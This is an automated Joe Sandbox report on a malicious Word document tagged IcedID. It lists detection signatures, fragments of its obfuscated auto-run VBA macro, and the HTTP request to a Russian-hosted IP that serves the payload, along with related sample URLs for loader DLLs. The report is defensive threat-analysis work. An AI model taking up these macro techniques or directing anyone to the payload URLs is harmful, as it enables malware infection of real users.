Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cnewton doc 08.11.2022.doc

Overview

General Information

Sample Name:cnewton doc 08.11.2022.doc
Analysis ID:682599
MD5:ee1d6eb5b07b99e65fc0cb477193c35c
SHA1:9d4dbf701c8ede93a79036dd5a0316da988a2eeb
SHA256:23b9a20a59041fc7d484957e49ffa7e0f6dba7dbbec0628a4adb69c2e05863ab
Tags:docIcedID
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2476 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: cnewton doc 08.11.2022.docVirustotal: Detection: 21%Perma Link
Source: cnewton doc 08.11.2022.docReversingLabs: Detection: 15%
Source: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fAvira URL Cloud: Label: malware
Source: cnewton doc 08.11.2022.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y6963.tmp.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficHTTP traffic detected: GET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: WINWORD.EXE, 00000000.00000000.1014370074.00000000068EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: WINWORD.EXE, 00000000.00000000.1014370074.00000000068EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: WINWORD.EXE, 00000000.00000000.1014370074.00000000068EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_
Source: WINWORD.EXE, 00000000.00000000.1014246934.0000000006889000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.1038045478.0000000006877000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.1014226864.0000000006877000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.1034391522.0000000004733000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.1014370074.00000000068EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.1013985218.00000000067CF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.1038056128.0000000006889000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.1014341955.00000000068D6000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.1037858643.00000000067CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
Source: WINWORD.EXE, 00000000.00000002.1038045478.0000000006877000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.1014226864.0000000006877000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fC:
Source: WINWORD.EXE, 00000000.00000000.1008798885.0000000000450000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fggC:
Source: WINWORD.EXE, 00000000.00000000.1013985218.00000000067CF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.1037858643.00000000067CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-ftem32
Source: WINWORD.EXE, 00000000.00000002.1033598751.0000000004170000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WINWORD.EXE, 00000000.00000002.1033598751.0000000004170000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C2BDA6D1-6BE1-4A92-95D9-C9069628F90E}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive

System Summary

barindex
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((EF9Yq0sar_("DgrVRLL_I")), EF9Yq0sar_("kMNkamqH7"), VbGet, EF9Yq0sar_("RQeWcJp24"))
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((), EF9Yq0sar_("qWfCNVnD"), VbGet, )
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((), EF9Yq0sar_("Qa6ipUt"), VbGet, )
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXECode function: 0_2_068740020_2_06874002
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Private Sub Document_Open()
Source: cnewton doc 08.11.2022.docOLE indicator, VBA macros: true
Source: cnewton doc 08.11.2022.docVirustotal: Detection: 21%
Source: cnewton doc 08.11.2022.docReversingLabs: Detection: 15%
Source: cnewton doc 08.11.2022.LNK.0.drLNK file: ..\..\..\..\..\Desktop\cnewton doc 08.11.2022.doc
Source: cnewton doc 08.11.2022.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ewton doc 08.11.2022.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5475.tmpJump to behavior
Source: classification engineClassification label: mal72.expl.winDOC@1/7@0/1
Source: cnewton doc 08.11.2022.docOLE document summary: title field not present or empty
Source: cnewton doc 08.11.2022.docOLE document summary: author field not present or empty
Source: cnewton doc 08.11.2022.docOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: cnewton doc 08.11.2022.docInitial sample: OLE zip file path = docProps/custom.xml
Source: cnewton doc 08.11.2022.docStatic file information: File size 2343230 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: WINWORD.EXE, 00000000.00000000.1008900196.0000000000980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: WINWORD.EXE, 00000000.00000000.1008900196.0000000000980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: WINWORD.EXE, 00000000.00000000.1008900196.0000000000980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Scripting
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts12
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
Scripting
Security Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
cnewton doc 08.11.2022.doc22%VirustotalBrowse
cnewton doc 08.11.2022.doc15%ReversingLabsScript-Macro.Trojan.Amphitryon
cnewton doc 08.11.2022.doc100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fC:0%Avira URL Cloudsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_0%Avira URL Cloudsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fggC:0%Avira URL Cloudsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-ftem320%Avira URL Cloudsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f100%Avira URL Cloudmalware
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-ftrue
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://www.%s.comPAWINWORD.EXE, 00000000.00000002.1033598751.0000000004170000.00000002.00000001.00040000.00000000.sdmpfalse
  • URL Reputation: safe
low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.WINWORD.EXE, 00000000.00000002.1033598751.0000000004170000.00000002.00000001.00040000.00000000.sdmpfalse
    high
    http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fC:WINWORD.EXE, 00000000.00000002.1038045478.0000000006877000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.1014226864.0000000006877000.00000004.00000001.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://45.8.146.139/fhfty/NH1-X8NL7CO4_WINWORD.EXE, 00000000.00000000.1014370074.00000000068EF000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fggC:WINWORD.EXE, 00000000.00000000.1008798885.0000000000450000.00000004.00000001.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-ftem32WINWORD.EXE, 00000000.00000000.1013985218.00000000067CF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.1037858643.00000000067CF000.00000004.00000001.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    45.8.146.139
    unknownRussian Federation
    44676VMAGE-ASRUfalse
    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:682599
    Start date and time:2022-08-11 18:56:49 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 3s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:cnewton doc 08.11.2022.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Run name:Without Instrumentation
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal72.expl.winDOC@1/7@0/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 75%
    • Number of executed functions: 5
    • Number of non-executed functions: 1
    Cookbook Comments:
    • Found application associated with file extension: .doc
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Unable to detect Microsoft Word
    • Close Viewer
    • Corrupt sample or wrongly selected analyzer.
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 13.89.179.12, 104.208.16.93
    • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    45.8.146.139suddenlink file 08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
    valliant.document.08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
    valliant.document.08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
    cnewton doc 08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
    cnewton doc 08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
    airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
    wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
    airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
    airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
    wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
    wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
    courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
    drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
    dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
    feltenberger doc 08.11.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
    agsilverfile08.11.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    VMAGE-ASRUsuddenlink file 08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139
    valliant.document.08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    valliant.document.08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    cnewton doc 08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    cnewton doc 08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139
    airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
